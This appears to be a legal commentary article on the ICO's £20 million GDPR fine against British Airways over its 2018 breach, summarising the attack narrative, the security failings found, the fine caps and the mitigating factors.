The Information Commissioner had originally served a Notice of Intent to fine BA £183.39 million. The final fine would have been £30 million but was reduced by 20% to £24 million to take account of mitigating factors, including later improvements to security and BA’s offer to reimburse any losses suffered by customers.
The fine was then further reduced to £20 million in light of the Commissioner’s Covid-19 related regulatory action policy amendments. The penalty notice was served on 16th October 2020. The breach affected nearly 430,000 data subjects and related to a security breach lasting from 22nd June to 5th September 2018.
Controllers must protect against attackers; anticipate attempts to breakout of Citrix environments; avoid storing passwords in plaintext; have processes in place to mitigate risks from accounts with privileged access rights; implement measures to detect unauthorised activity – including attempts to activate guest accounts in Windows and changes to website code; and have effective review processes for moving from a development to live environment
The breach involved access to stored credit card data and “skimming” of credit card data from BA’s website. The attacker used compromised credentials for an employee of Swissport, who had access rights to BA’s systems, to log into to BA’s systems. The attacker then broke-out of the Citrix environment accessible to the Swissport employee and accessed other BA systems. This included accessing usernames and passwords of privileged domain administrators and a system administrator. Using these credentials, the attacker exfiltrated credit card from BA’s systems in two ways. First, the attacker found a record of credit card details and CVV numbers stored in plaintext. This record had been inadvertently created when BA carried out testing on a new feature and did not decommission a debugging script when the feature went live. Second, the attacker “skimmed” credit card data from britishairways.com, by redirecting traffic to BAways.com. BA was notified of the redirection on 5th September 2018. It contained the vulnerability within 90 minutes of receiving notice and blocked the redirection within a further 20 minutes. In total, data relating to 429,612 individuals worldwide was affected, although not all of this included credit card data. Name, address, credit card and CVV number was exfiltrated for 244,000 individuals.
The Commissioner acknowledged that not every breach of security would amount to a breach of the GDPR and that she should not reason solely with the benefit of hindsight. Th; e penalty notice describes her role as to focus on whether the controller implemented adequate and appropriate security measures; what risks were known or could reasonably have been known at the time; and determining whether there was a failure to put appropriate measures in place.
The Commissioner found multiple failings:
BA is facing group litigation in relation to the incident – and the findings of fault in the Commissioner’s monetary penalty notice will be helpful to the claimants there.
Breaches of security can trigger the higher, 4% fine – turnover is assessed by reference to the revenue of the controller responsible for the breach, not that of a parent company which is not the responsible controller
Readers who know their GDPR by heart will know that the obligation to implement appropriate technical and organisational measures is set out in Art. 32 GDPR – for which the maximum fine is 2% of worldwide turnover or €10 million, whichever is higher. However, the GDPR also refers to an obligation to implement appropriate security in Article 5(1)(f) – among the data protection principles applicable to controllers – for which the maximum fine is 4% or €20 million.
ICO found BA to be in breach of Article 5(1)(f) – thus allowing the higher cap to be applied (although the actual penalty imposed is, any event, within the lower amount).
BA is a subsidiary of International Consolidated Airlines Group S.A. ICO concluded that BA was the controller here and looked to the BA’s turnover in assessing the penalty, not the turnover of its parent.
Relevant factors in setting and reducing the fine
The final decision notice doesn’t explain how the Commissioner arrived at the revised figure of £30 million. The penalty notice shows that BA argued (unsuccessfully) that the lack of clear guidance from the Commissioner as to the amount of a penalty that would be imposed should prevent the Commissioner from being able to impose any penalty – or should restrict her to pre-GDPR levels.
Mitigating factors included later investment in better security, the fact that BA had detailed customer outreach, made information available swiftly via the press, that it engaged with card issuers and offered to reimburse losses
The Commissioner rejected arguments by BA that she relied too heavily on turnover to set the fine and that – by comparison with fines levied by other EEA authorities – this was too high. Unsurprisingly, she also rejected the argument from BA that security breaches involving credit card data are so commonplace that it was not credible for the Commissioner to assert, as a factor in setting the penalty, that cardholders would have suffered some distress. Readers may be interested to note that the Commissioner relied on an ENISA methodology to assess the severity of the breach.